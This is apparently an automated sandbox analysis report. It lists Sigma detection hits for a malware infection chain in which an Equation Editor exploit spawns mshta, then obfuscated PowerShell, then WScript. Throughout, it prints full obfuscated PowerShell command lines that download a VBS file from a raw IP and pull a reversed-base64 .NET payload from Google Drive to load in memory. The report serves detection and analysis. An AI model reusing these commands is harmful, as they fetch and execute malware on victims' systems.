iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta" , CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3964, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta" , ProcessId: 4040, ProcessName: mshta.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3180, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe, ProcessId: 2052, ProcessName: powershell.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3180, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , ProcessId: 3068, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDth
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3180, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline", ProcessId: 2756, ProcessName: csc.exe
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3180, TargetFilename: C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3492, Protocol: tcp, SourceIp: 24.199.88.84, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,zts
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,zts
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC